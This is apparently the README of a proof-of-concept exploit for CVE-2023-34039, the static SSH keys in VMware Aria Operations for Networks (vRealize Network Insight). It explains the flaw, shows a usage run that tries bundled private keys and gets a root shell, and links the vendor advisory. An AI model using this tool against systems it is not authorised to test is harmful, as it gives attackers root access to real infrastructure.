# CVE-2023-34039
POC for CVE-2023-34039 VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE

## Technical Analysis
A root cause analysis of the vulnerability can be found on my blog:

https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-34039/

![poc](poc.gif)


## Summary
VMWare Aria Operations for Networks (vRealize Network Insight) from version 6.0 to 6.10 did not regenerate the ssh keys for the `support` and `ubuntu` users, allowing an attacker with SSH access to gain `root` shell access to this product.

This issue was reported to VMWare by <a style="text-decoration: none" href="https://twitter.com/rootxharsh" target="_blank">Harsh Jaiswal (@rootxharsh)</a>
and <a style="text-decoration: none" href="https://twitter.com/iamnoooob" target="_blank">Rahul Maini (@iamnoooob)</a> at <a style="text-decoration: none" href="https://twitter.com/pdiscoveryio" target="_blank">ProjectDiscovery Research</a>

I just wrote the exploit, if you can call it that, cause it's basically a ssh command wrapper.

## Usage
```plaintext
python CVE-2023-34039.py --target 192.168.1.16
(!) VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)

(*) Exploit by Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)

(*) Trying key: keys/vrni-6.2.0/id_rsa_vnera_keypair_6.2.0_collector

(*) Trying key: keys/vrni-6.2.0/id_rsa_vnera_keypair_6.2.0_platform

(*) Trying key: keys/vrni-6.10.0/id_rsa_vnera_keypair_6.10.0_platform


********************************** ATTENTION **********************************
 NTP Service is not healthy.
 IMPACT: It may affect the proper working of other services.
 ACTION: Restore the service using 'ntp' CLI command.
********************************** ATTENTION **********************************
support@vrni-platform-release:~$ sudo -i
root@vrni-platform-release:~# id
uid=0(root) gid=0(root) groups=0(root)
root@vrni-platform-release:~# hostname
vrni-platform-release
root@vrni-platform-release:~# 

```

## Mitigations
Update to the latest version or mitigate by following the instructions within the Progress Advisory
* https://www.vmware.com/security/advisories/VMSA-2023-0018.html

## Follow Us on for the more security research:
*  [SinSinology](https://twitter.com/SinSinology)
*  [SummoningTeam](https://twitter.com/SummoningTeam)

## Disclaimer
This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.

